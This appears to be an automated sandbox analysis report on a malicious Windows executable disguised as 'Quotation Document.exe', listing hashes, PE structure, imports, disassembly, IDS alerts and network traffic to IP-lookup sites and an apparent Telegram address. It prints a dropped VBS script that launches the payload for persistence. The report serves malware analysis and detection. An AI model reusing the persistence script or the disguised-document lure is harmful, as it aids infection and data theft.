                                                              Preview:...MR9Q1FK86..YB.CDO7FI7.Q9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLC.O7FG(._9.8.j.7..x.$*7oG4&P?0TqR#%VY1o;'l11!./'...jq\-/].HBSfLCDO7FI_]..}@.5.G.1u3.=vlH8vF./2.<`I.;c(.2.5.ItjY3MH.OphQH.>.<~`?1.7.I.8Z9.3.F6EOYBLCDO7FI7MQ9...86EO..LC.N3F=.M.9Q1BK86E.YaMHEF7F.6MQ.P1BK86j.YBLSDO7.H7MQyQ1RK86GOYGLCDO7FI2MQ9Q1BK8.FOYFLC.t5FK7M.9Q!BK(6EOYRLCTO7FI7MA9Q1BK86EOYB.VFOgFI7M1;Q.SJ86EOYBLCDO7FI7MQ9Q1BK86EO..MCXO7FI7MQ9Q1BK86EOYBLCDO7FI7M.4S1.K86EOYBLCDO7.H7.P9Q1BK86EOYBLCDO7FI7MQ9Q1BK.B 7-BLC\.6FI'MQ9.0BK<6EOYBLCDO7FI7Mq9QQl9\W1.YB..DO7.H7M?9Q1.J86EOYBLCDO7FIwMQy.U#?Y6EO.rLCDo5FI!MQ9[3BK86EOYBLCDO7.I7..K"C!K86.^XBL#FO7TH7Mq;Q1BK86EOYBLCD.7F.7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86E
                                                              Process:C:\Users\user\Desktop\Quotation Document.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1175717
                                                              Entropy (8bit):7.298173654239306
                                                              Encrypted:false
                                                              SSDEEP:12288:ALkcoxg7v3qnC11ErwIhh0F4qwUgUny5QLURDWlWWUXVDioc0ELeN3FuYy96QX4w:WfmMv6Ckr7Mny5QLURKgWod7TgIQXae
                                                              MD5:CD3C7F532DCFFD81361915BF691CFBD0
                                                              SHA1:DDAA78FA6DF0B9F19A0B7C9E8F54C4224F6A7A14
                                                              SHA-256:5E3521BEE81BB39DAE47648627EA8810F88DC0A16055EFA1EADD779F804F60F1
                                                              SHA-512:D22B4F09FE235B8CBE6827C7158BECF3573A4E5DA6BB4F22E54055376195BFD812D8642969B9B2F917598B227FACEDD99C82C914E96B3FA5658B77BF83372F25
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 66%
                                                              Reputation:low
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i.i.i..9.k.`.:.w.`.,...`.+.P.N%.c.N%.H.i.d.`. ./.w.:.k.w.;.h.i.8.h.`.>.h.Richi.........................PE..L.....K..........#..................c....... ....@.................................5!........@.......@.....................<...T........6........................................................................... ..@............................text............................... ..`.rdata..\.... ......................@..@.data............h..................@....rsrc....6.......8...H..............@..@................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\user\AppData\Local\emboweling\neophobia.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):280
                                                              Entropy (8bit):3.412589300103438
                                                              Encrypted:false
                                                              SSDEEP:6:DMM8lfm3OOQdUfcloRKUEZ+lX1AlflYeZmLnriIM8lfQVn:DsO+vNloRKQ1AlflYeYzmA2n
                                                              MD5:67E9199FDAA17EB181AA5048FFE0A226
                                                              SHA1:096852458ADE248BB690984AF8BCEEE40FF12ECC
                                                              SHA-256:1E6757F9367A9FE0BF0D82B07624EF5991F4A8581F533C40E889BAAB71C0495E
                                                              SHA-512:75F226C4EC087AD3C0B5BAA52DE667A3518836EF930F079234092E924D40A525AC6D6E693214AB90798FB2B311C7FBD5163BD3D4D43702E9A2DD75C80993CCC7
                                                              Malicious:true
                                                              Reputation:low
                                                              Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.e.m.b.o.w.e.l.i.n.g.\.n.e.o.p.h.o.b.i.a...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):7.298173654239306
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 95.11%
                                                              • AutoIt3 compiled script executable (510682/80) 4.86%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:Quotation Document.exe
                                                              File size:1'175'717 bytes
                                                              MD5:cd3c7f532dcffd81361915bf691cfbd0
                                                              SHA1:ddaa78fa6df0b9f19a0b7c9e8f54c4224f6a7a14
                                                              SHA256:5e3521bee81bb39dae47648627ea8810f88dc0a16055efa1eadd779f804f60f1
                                                              SHA512:d22b4f09fe235b8cbe6827c7158becf3573a4e5da6bb4f22e54055376195bfd812d8642969b9b2f917598b227facedd99c82c914e96b3fa5658b77bf83372f25
                                                              SSDEEP:12288:ALkcoxg7v3qnC11ErwIhh0F4qwUgUny5QLURDWlWWUXVDioc0ELeN3FuYy96QX4w:WfmMv6Ckr7Mny5QLURKgWod7TgIQXae
                                                              TLSH:3F45BF22B2D640F5E9923D721D26E316BF766D158622C48FD7A03EF64A33340D6263F6
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........
                                                              Icon Hash:cf818c848c8a814f
                                                              Entrypoint:0x416310
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:5
                                                              OS Version Minor:0
                                                              File Version Major:5
                                                              File Version Minor:0
                                                              Subsystem Version Major:5
                                                              Subsystem Version Minor:0
                                                              Import Hash:aaaa8913c89c8aa4a5d93f06853894da
                                                              Instruction
                                                              call 00007FE51CB8607Ch
                                                              jmp 00007FE51CB79E4Eh
                                                              int3
                                                              int3
                                                              int3
                                                              int3
                                                              int3
                                                              int3
                                                              push ebp
                                                              mov ebp, esp
                                                              push edi
                                                              push esi
                                                              mov esi, dword ptr [ebp+0Ch]
                                                              mov ecx, dword ptr [ebp+10h]
                                                              mov edi, dword ptr [ebp+08h]
                                                              mov eax, ecx
                                                              mov edx, ecx
                                                              add eax, esi
                                                              cmp edi, esi
                                                              jbe 00007FE51CB79FDAh
                                                              cmp edi, eax
                                                              jc 00007FE51CB7A17Ah
                                                              cmp ecx, 00000100h
                                                              jc 00007FE51CB79FF1h
                                                              cmp dword ptr [004A94E0h], 00000000h
                                                              je 00007FE51CB79FE8h
                                                              push edi
                                                              push esi
                                                              and edi, 0Fh
                                                              and esi, 0Fh
                                                              cmp edi, esi
                                                              pop esi
                                                              pop edi
                                                              jne 00007FE51CB79FDAh
                                                              pop esi
                                                              pop edi
                                                              pop ebp
                                                              jmp 00007FE51CB7A43Ah
                                                              test edi, 00000003h
                                                              jne 00007FE51CB79FE7h
                                                              shr ecx, 02h
                                                              and edx, 03h
                                                              cmp ecx, 08h
                                                              jc 00007FE51CB79FFCh
                                                              rep movsd
                                                              jmp dword ptr [00416494h+edx*4]
                                                              nop
                                                              mov eax, edi
                                                              mov edx, 00000003h
                                                              sub ecx, 04h
                                                              jc 00007FE51CB79FDEh
                                                              and eax, 03h
                                                              add ecx, eax
                                                              jmp dword ptr [004163A8h+eax*4]
                                                              jmp dword ptr [004164A4h+ecx*4]
                                                              nop
                                                              jmp dword ptr [00416428h+ecx*4]
                                                              nop
                                                              mov eax, E4004163h
                                                              arpl word ptr [ecx+00h], ax
                                                              or byte ptr [ecx+eax*2+00h], ah
                                                              and edx, ecx
                                                              mov al, byte ptr [esi]
                                                              mov byte ptr [edi], al
                                                              mov al, byte ptr [esi+01h]
                                                              mov byte ptr [edi+01h], al
                                                              mov al, byte ptr [esi+02h]
                                                              shr ecx, 02h
                                                              mov byte ptr [edi+02h], al
                                                              add esi, 03h
                                                              add edi, 03h
                                                              cmp ecx, 08h
                                                              jc 00007FE51CB79F9Eh
                                                              Programming Language:
                                                              • [ASM] VS2008 SP1 build 30729
                                                              • [ C ] VS2008 SP1 build 30729
                                                              • [C++] VS2008 SP1 build 30729
                                                              • [ C ] VS2005 build 50727
                                                              • [IMP] VS2005 build 50727
                                                              • [ASM] VS2008 build 21022
                                                              • [RES] VS2008 build 21022
                                                              • [LNK] VS2008 SP1 build 30729
                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x8cd3c0x154.rdata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x136e8.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x820000x840.rdata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x800170x802006c20c6bf686768b6f134f5bd508171bcFalse0.5602991615853659data6.634688230255595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rdata0x820000xd95c0xda00f979966509a93083729d23cdfd2a6f2dFalse0.36256450688073394data4.880040824124099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0x900000x1a5180x6800e5d77411f751d28c6eee48a743606795False0.1600060096153846data2.2017649896261107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc0xab0000x136e80x1380025f5ac98668909564a535af77849da6eFalse0.08760266426282051data3.8826931644611715IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_ICON0xab4480x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                              RT_ICON0xab5700x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                              RT_ICON0xab6980x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                              RT_ICON0xab7c00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishGreat Britain0.05220040222406246
                                                              RT_MENU0xbbfe80x50dataEnglishGreat Britain0.9
                                                              RT_DIALOG0xbc0380xfcdataEnglishGreat Britain0.6507936507936508
                                                              RT_STRING0xbc1380x530dataEnglishGreat Britain0.33960843373493976
                                                              RT_STRING0xbc6680x690dataEnglishGreat Britain0.26964285714285713
                                                              RT_STRING0xbccf80x43adataEnglishGreat Britain0.3733826247689464
                                                              RT_STRING0xbd1380x5fcdataEnglishGreat Britain0.3087467362924282
                                                              RT_STRING0xbd7380x65cdataEnglishGreat Britain0.34336609336609336
                                                              RT_STRING0xbdd980x388dataEnglishGreat Britain0.377212389380531
                                                              RT_STRING0xbe1200x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                              RT_GROUP_ICON0xbe2780x14dataEnglishGreat Britain1.25
                                                              RT_GROUP_ICON0xbe2900x14dataEnglishGreat Britain1.15
                                                              RT_GROUP_ICON0xbe2a80x14dataEnglishGreat Britain1.25
                                                              RT_GROUP_ICON0xbe2c00x14dataEnglishGreat Britain1.25
                                                              RT_VERSION0xbe2d80x19cdataEnglishGreat Britain0.5339805825242718
                                                              RT_MANIFEST0xbe4780x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                                                              DLLImport
                                                              WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                              VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                              COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                              MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                              WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                              PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                              USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                              KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
                                                              USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
                                                              GDI32.dllDeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
                                                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                              ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                              ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
                                                              OLEAUT32.dllSafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData
                                                              Language of compilation systemCountry where language is spokenMap
                                                              EnglishGreat Britain
                                                              EnglishUnited States
                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-11-01T00:37:15.917486+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.449730TCP
                                                              2024-11-01T00:37:55.525342+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.449736TCP
                                                              2024-11-01T00:38:46.434821+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449826193.122.6.16880TCP
                                                              2024-11-01T00:38:52.887926+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449826193.122.6.16880TCP
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 1, 2024 00:38:45.289541006 CET4982680192.168.2.4193.122.6.168
                                                              Nov 1, 2024 00:38:45.294693947 CET8049826193.122.6.168192.168.2.4
                                                              Nov 1, 2024 00:38:45.294768095 CET4982680192.168.2.4193.122.6.168
                                                              Nov 1, 2024 00:38:45.294976950 CET4982680192.168.2.4193.122.6.168
                                                              Nov 1, 2024 00:38:45.299787998 CET8049826193.122.6.168192.168.2.4
                                                              Nov 1, 2024 00:38:46.131339073 CET8049826193.122.6.168192.168.2.4
                                                              Nov 1, 2024 00:38:46.137242079 CET4982680192.168.2.4193.122.6.168
                                                              Nov 1, 2024 00:38:46.142038107 CET8049826193.122.6.168192.168.2.4
                                                              Nov 1, 2024 00:38:46.382054090 CET8049826193.122.6.168192.168.2.4
                                                              Nov 1, 2024 00:38:46.394105911 CET49827443192.168.2.4188.114.96.3
                                                              Nov 1, 2024 00:38:46.394136906 CET44349827188.114.96.3192.168.2.4
                                                              Nov 1, 2024 00:38:46.394256115 CET49827443192.168.2.4188.114.96.3
                                                              Nov 1, 2024 00:38:46.407185078 CET49827443192.168.2.4188.114.96.3
                                                              Nov 1, 2024 00:38:46.407200098 CET44349827188.114.96.3192.168.2.4
                                                              Nov 1, 2024 00:38:46.434820890 CET4982680192.168.2.4193.122.6.168
                                                              Nov 1, 2024 00:38:47.027597904 CET44349827188.114.96.3192.168.2.4
                                                              Nov 1, 2024 00:38:47.027770996 CET49827443192.168.2.4188.114.96.3
                                                              Nov 1, 2024 00:38:47.032037973 CET49827443192.168.2.4188.114.96.3
                                                              Nov 1, 2024 00:38:47.032052040 CET44349827188.114.96.3192.168.2.4
                                                              Nov 1, 2024 00:38:47.032335997 CET44349827188.114.96.3192.168.2.4
                                                              Nov 1, 2024 00:38:47.075400114 CET49827443192.168.2.4188.114.96.3
                                                              Nov 1, 2024 00:38:47.085252047 CET49827443192.168.2.4188.114.96.3
                                                              Nov 1, 2024 00:38:47.131329060 CET44349827188.114.96.3192.168.2.4
                                                              Nov 1, 2024 00:38:47.227523088 CET44349827188.114.96.3192.168.2.4
                                                              Nov 1, 2024 00:38:47.227608919 CET44349827188.114.96.3192.168.2.4
                                                              Nov 1, 2024 00:38:47.227709055 CET49827443192.168.2.4188.114.96.3
                                                              Nov 1, 2024 00:38:47.246311903 CET49827443192.168.2.4188.114.96.3
                                                              Nov 1, 2024 00:38:52.402282000 CET4982680192.168.2.4193.122.6.168
                                                              Nov 1, 2024 00:38:52.602669001 CET8049826193.122.6.168192.168.2.4
                                                              Nov 1, 2024 00:38:52.842931986 CET8049826193.122.6.168192.168.2.4
                                                              Nov 1, 2024 00:38:52.856843948 CET49828443192.168.2.4149.154.167.220
                                                              Nov 1, 2024 00:38:52.856880903 CET44349828149.154.167.220192.168.2.4
                                                              Nov 1, 2024 00:38:52.856940031 CET49828443192.168.2.4149.154.167.220
                                                              Nov 1, 2024 00:38:52.857371092 CET49828443192.168.2.4149.154.167.220
                                                              Nov 1, 2024 00:38:52.857383013 CET44349828149.154.167.220192.168.2.4
                                                              Nov 1, 2024 00:38:52.887926102 CET4982680192.168.2.4193.122.6.168
                                                              Nov 1, 2024 00:38:53.696963072 CET44349828149.154.167.220192.168.2.4
                                                              Nov 1, 2024 00:38:53.697046995 CET49828443192.168.2.4149.154.167.220
                                                              Nov 1, 2024 00:38:53.698821068 CET49828443192.168.2.4149.154.167.220
                                                              Nov 1, 2024 00:38:53.698832989 CET44349828149.154.167.220192.168.2.4
                                                              Nov 1, 2024 00:38:53.699074030 CET44349828149.154.167.220192.168.2.4
                                                              Nov 1, 2024 00:38:53.700611115 CET49828443192.168.2.4149.154.167.220
                                                              Nov 1, 2024 00:38:53.743350029 CET44349828149.154.167.220192.168.2.4
                                                              Nov 1, 2024 00:38:53.743485928 CET49828443192.168.2.4149.154.167.220
                                                              Nov 1, 2024 00:38:53.743494987 CET44349828149.154.167.220192.168.2.4
                                                              Nov 1, 2024 00:38:54.124676943 CET44349828149.154.167.220192.168.2.4
                                                              Nov 1, 2024 00:38:54.169142962 CET49828443192.168.2.4149.154.167.220
                                                              Nov 1, 2024 00:38:54.169166088 CET44349828149.154.167.220192.168.2.4
                                                              Nov 1, 2024 00:38:54.169523001 CET49828443192.168.2.4149.154.167.220
                                                              Nov 1, 2024 00:38:54.169620037 CET44349828149.154.167.220192.168.2.4
                                                              Nov 1, 2024 00:38:54.169673920 CET49828443192.168.2.4149.154.167.220
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 1, 2024 00:38:45.276662111 CET5120253192.168.2.41.1.1.1
                                                              Nov 1, 2024 00:38:45.283238888 CET53512021.1.1.1192.168.2.4
                                                              Nov 1, 2024 00:38:46.385384083 CET5950953192.168.2.41.1.1.1
                                                              Nov 1, 2024 00:38:46.392575979 CET53595091.1.1.1192.168.2.4
                                                              Nov 1, 2024 00:38:52.848078966 CET5162253192.168.2.41.1.1.1
                                                              Nov 1, 2024 00:38:52.856120110 CET53516221.1.1.1192.168.2.4
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Nov 1, 2024 00:38:45.276662111 CET192.168.2.41.1.1.10x5551Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                              Nov 1, 2024 00:38:46.385384083 CET192.168.2.41.1.1.10xe7feStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
